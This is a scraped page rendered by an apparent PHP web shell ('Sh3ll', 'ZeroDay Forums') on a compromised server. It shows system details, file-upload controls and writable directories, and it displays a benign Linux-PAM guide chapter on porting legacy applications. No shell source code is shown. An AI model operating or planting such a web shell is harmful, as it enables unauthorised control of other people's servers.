Sh3ll
OdayForums


Server : Apache
System : Linux server1.cgrithy.com 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : nobody ( 99)
PHP Version : 8.1.23
Disable Function : NONE
Directory :  /usr/share/doc/pam-devel-1.1.8/html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/doc/pam-devel-1.1.8/html/adg-porting.html
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Chapter 6. Porting legacy applications</title><meta name="generator" content="DocBook XSL Stylesheets V1.78.1"><link rel="home" href="Linux-PAM_ADG.html" title="The Linux-PAM Application Developers' Guide"><link rel="up" href="Linux-PAM_ADG.html" title="The Linux-PAM Application Developers' Guide"><link rel="prev" href="adg-libpam-functions.html" title="5.1. Functions supplied"><link rel="next" href="adg-glossary.html" title="Chapter 7. Glossary of PAM related terms"></head><body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"><div class="navheader"><table width="100%" summary="Navigation header"><tr><th colspan="3" align="center">Chapter 6. Porting legacy applications</th></tr><tr><td width="20%" align="left"><a accesskey="p" href="adg-libpam-functions.html">Prev</a> </td><th width="60%" align="center"> </th><td width="20%" align="right"> <a accesskey="n" href="adg-glossary.html">Next</a></td></tr></table><hr></div><div class="chapter"><div class="titlepage"><div><div><h1 class="title"><a name="adg-porting"></a>Chapter 6. Porting legacy applications</h1></div></div></div><p>
      The point of PAM is that the application is not supposed to
      have any idea how the attached authentication modules will choose
      to authenticate the user. So all they can do is provide a conversation
      function that will talk directly to the user(client) on the modules'
      behalf.
    </p><p>
      Consider the case that you plug a retinal scanner into the login
      program. In this situation the user would be prompted: "please look
      into the scanner". No username or password would be needed - all this
      information could be deduced from the scan and a database lookup. The
      point is that the retinal scanner is an ideal task for a "module".
    </p><p>
      While it is true that a pop-daemon program is designed with the POP
      protocol in mind and no-one ever considered attaching a retinal
      scanner to it, it is also the case that the "clean" PAM'ification of
      such a daemon would allow for the possibility of a scanner module
      being be attached to it. The point being that the "standard"
      pop-authentication protocol(s) [which will be needed to satisfy
      inflexible/legacy clients] would be supported by inserting an
      appropriate pam_qpopper module(s).  However, having rewritten
      <span class="command"><strong>popd</strong></span> once in this way any new protocols can be
      implemented in-situ.
    </p><p>
      One simple test of a ported application would be to insert the
      <span class="command"><strong>pam_permit</strong></span> module and see if the application
      demands you type a password...  In such a case, <span class="command"><strong>xlock</strong></span>
      would fail to lock the terminal - or would at best be a screen-saver,
      ftp would give password free access to all etc..  Neither of
      these is a very secure thing to do, but they do illustrate how
      much flexibility PAM puts in the hands of the local admin.
    </p><p>
      The key issue, in doing things correctly, is identifying what is part
      of the authentication procedure (how many passwords etc..) the
      exchange protocol (prefixes to prompts etc., numbers like 331 in the
      case of ftpd) and what is part of the service that the application
      delivers.  PAM really needs to have total control in the
      authentication "procedure", the conversation function should only
      deal with reformatting user prompts and extracting responses from raw
      input.
    </p></div><div class="navfooter"><hr><table width="100%" summary="Navigation footer"><tr><td width="40%" align="left"><a accesskey="p" href="adg-libpam-functions.html">Prev</a> </td><td width="20%" align="center"> </td><td width="40%" align="right"> <a accesskey="n" href="adg-glossary.html">Next</a></td></tr><tr><td width="40%" align="left" valign="top">5.1. Functions supplied </td><td width="20%" align="center"><a accesskey="h" href="Linux-PAM_ADG.html">Home</a></td><td width="40%" align="right" valign="top"> Chapter 7. Glossary of PAM related terms</td></tr></table></div></body></html>

ZeroDay Forums Mini